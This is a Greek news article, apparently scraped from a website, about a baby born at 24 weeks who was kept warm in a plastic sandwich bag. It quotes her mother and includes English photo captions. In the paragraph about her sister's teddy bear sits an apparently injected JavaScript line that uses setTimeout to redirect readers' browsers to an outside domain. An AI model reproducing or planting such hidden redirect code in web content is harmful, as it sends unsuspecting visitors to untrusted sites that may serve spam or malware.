Πλαστική σακούλα για σάντουιτς κράτησε στη ζωή την μικρούλα Emily (ΕΙΚΟΝΕΣ)

0
45

 

 

Ένα πρόωρο μωράκι γεννήθηκε στην 24 εβδομάδα κύησης μέσα στον αμνιακό σάκο και προκειμένου να κρατηθεί στη ζωή οι γιατροί την τοποθέτησαν σε μία πλαστική σακούλα για σάντουιτς!

Η μικρούλα Emily αποδείχθηκε μεγάλη μαχήτρια διότι κατόρθωσε να ξεπεράσει όλους τους σκόπελους και να επιστρέψει στο σπίτι της και όπως δηλώνουν τώρα οι γονείς της «ανυπομονούν να κάνουν όνειρα για το μέλλον και να γιορτάσουν όλοι μαζί τα Χριστούγεννα»

A scan of baby Emily was taken just weeks before she was delivered at 24 weeks

Η μητέρα της Rhiannon στην 20 εβδομάδα όταν υποβλήθηκε σε εξετάσεις για την υγεία του μωρού της, οι γιατροί παρατήρησαν ανωμαλίες στο αίμα της, έτσι την έστειλαν για περαιτέρω εξετάσεις για να διαπιστώσουν αν είχε σύνδρομο Down.

«Πήραν υγρό από το αμνιακό σάκο, ενώ ήμουν έγκυος, οι εξετάσεις ήταν αρνητικές για το σύνδρομο Down, αργότερα διαπίστωσα ότι είχα μια μόλυνση στον πλακούντα μου», είπε η μητέρα της.

«Και αυτό ήταν η αιτία της πρόωρης γέννησης της. Έχουμε την αίσθηση ότι η Emily απλά ήξερε ότι έπρεπε να βγει από εκεί. Είναι ένα θαύμα που επέζησε».

The family are now happy to be reunited after Ms Shades and daughter Emily came home from hospital - just one day before her due date

Γεννήθηκε μόλις 560 γραμμάρια και υποβλήθηκε σε οκτώ μεταγγίσεις αίματος ενώ η πλαστική σακούλα βοήθησε το λεπτό σωματάκι της να διατηρεί σταθερή την θερμοκρασία του…

Emily was given the teddy, which was bigger than she was at birth, by her big sister Alexandra

Ήταν τόσο μικροσκοπική που το αρκουδάκι που της χάρισε η μεγαλύτερη αδελφή της την ξεπερνούσε στο μέγεθος. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here